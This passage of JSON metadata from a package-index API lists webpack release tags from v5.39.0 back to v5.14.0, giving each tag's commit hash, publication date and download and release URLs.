//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":